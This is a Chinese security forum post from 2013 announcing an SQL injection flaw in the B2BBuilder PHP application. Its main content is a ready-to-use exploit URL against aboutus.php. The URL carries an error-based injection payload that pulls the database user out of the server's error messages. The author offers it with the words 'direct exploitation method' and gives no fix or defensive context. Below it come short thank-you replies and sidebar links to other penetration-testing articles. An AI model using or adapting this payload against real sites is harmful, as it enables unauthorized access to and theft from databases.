[我爱t00ls] B2BBuilder 注入漏洞

2013-09-05 01:37:59 17 xiaoxiaoabc 3960

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.

直接上利用方式,大家一看就懂.

http://localhost/b2b/aboutus.php?type=12345'  aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc

评论17次

要评论？请先登录或注册

17楼

krystalvip
2016-7-8 18:36

收藏了，感谢楼主

回复|@ta|踩(0)|顶(0)
16楼

xia1234
2013-9-28 16:08

这个可以有。

回复|@ta|踩(0)|顶(0)
15楼

dullub
2013-9-27 23:06

为啥这套程序都下载下来啊

回复|@ta|踩(0)|顶(0)
14楼

—7℃
2013-9-10 18:45

看完了，就得回复下

回复|@ta|踩(0)|顶(0)
13楼

ji4nr3n
2013-9-10 18:26

感谢作者的无私奉献

回复|@ta|踩(0)|顶(0)
12楼

cc4ss
2013-9-10 17:12

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
11楼

kk_skipper
2013-9-7 09:08

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
10楼

yantou
2013-9-6 21:09

收了谢谢啊

回复|@ta|踩(0)|顶(0)
9楼

xiaoxiaoabc
2013-9-5 21:07

mlgb

回复|@ta|踩(0)|顶(0)
8楼

lmy
2013-9-5 19:34

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
7楼

cnxxxxcn
2013-9-5 15:21

这个可以呵呵~~~

回复|@ta|踩(0)|顶(0)
6楼

Yaseng
2013-9-5 15:05

支持下lz

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2013-9-5 10:29

呵呵，支持一下、、、、

回复|@ta|踩(0)|顶(0)
4楼

uuwhat
2013-9-5 09:01

感谢

回复|@ta|踩(0)|顶(0)
3楼

twygame
2013-9-5 08:56

牛BB的人啊。。求带。

回复|@ta|踩(0)|顶(0)
2楼

hiicome
2013-9-5 06:36

收下了。都不错的

回复|@ta|踩(0)|顶(0)
1楼

52pride
2013-9-5 02:02

沙发

回复|@ta|踩(0)|顶(0)

渗透测试Java 安全 | Click1 链分析

Click1 链分析环境说明链路分析危险方法PropertyUtils::getValue ...

2025-05-06 11:55:20 7 926

安全资讯调查显示甲骨文云服务器确实被攻击并泄露数据但甲骨文始终没有承认

早前名为 rose87168 的黑客发帖称在 2025 年 2 月份入侵 Oracle ...

2025-03-31 17:08:33 7 2351

渗透测试记录一次真实信息泄露

获取prod-web-auth-api/gateway/commonPostLogin 接口类似于获取 ...

2025-03-20 17:15:33 38 3960

安全资讯FUNSTAT - Telegram有人索引了大量用户的公开信息并做成bot可供所有人查询

用自己的号测试了下，收集的信息非常全面，包括了你的用户名变更 ...

2025-03-25 08:17:56 32 4246

渗透测试投稿文章：在cron中添加隐藏计划任务

## 原理`/etc/crontab`文件是系统级计划任务配置，几乎没有人修 ...

2025-05-14 14:56:40 11 6616

精华推荐

渗透测试传销站渗透录

零、起因快过年了，拿到了旧电脑，翻出来很多东西。看到论坛对网 ...

2019-01-31 20:55:56 80 5485

渗透测试某金融app的加解密hook+rpc+绕过SSLPinning抓包

## 0x01 抓包### 1.1 burp抓包测试(抓不到)### 1.2 httpcanaryHt ...

2023-03-07 21:57:51 65 21157

渗透测试Bit-flipping Attack 笔记

Bit-flippting attack 是针对于 CBC 加密模式的一类攻击。攻击的 ...

2015-03-19 12:43:19 4 12541

逆向破解某VPN客户端远程下载文件执行模拟逆向分析

# 某VPN客户端远程下载文件执行模拟逆向分析## 前言2021年3月， ...

2022-08-29 10:04:23 60 2730

手机无线我是如何随时随地控制全校宿舍楼大门的

表弟才疏学浅，边百度边写的PHP。文章是以一个新手的视角来写的 ...

2016-12-16 23:23:53 28 1440

Top ↑

[我爱t00ls] B2BBuilder 注入漏洞

关于作者

评论17次

收藏了，感谢楼主

这个可以有。

为啥这套程序都下载下来啊

看完了，就得回复下

感谢作者的无私奉献

支持原创，谢谢分享。

支持原创，谢谢分享。

收了谢谢啊

mlgb

支持原创，谢谢分享。

这个可以 呵呵~~~

支持下lz

呵呵，支持一下、、、、

感谢

牛BB的人啊。。求带。

收下了。都不错的

沙发

热门文章

渗透测试Java 安全 | Click1 链分析

安全资讯调查显示甲骨文云服务器确实被攻击并泄露数据 但甲骨文始终没有承认

渗透测试记录一次真实信息泄露

安全资讯FUNSTAT - Telegram有人索引了大量用户的公开信息并做成bot可供所有人查询

渗透测试投稿文章：在cron中添加隐藏计划任务

最新回复

精华推荐

渗透测试传销站渗透录

渗透测试某金融app的加解密hook+rpc+绕过SSLPinning抓包

渗透测试Bit-flipping Attack 笔记

逆向破解某VPN客户端远程下载文件执行模拟逆向分析

手机无线我是如何随时随地控制全校宿舍楼大门的

这个可以呵呵~~~

安全资讯调查显示甲骨文云服务器确实被攻击并泄露数据但甲骨文始终没有承认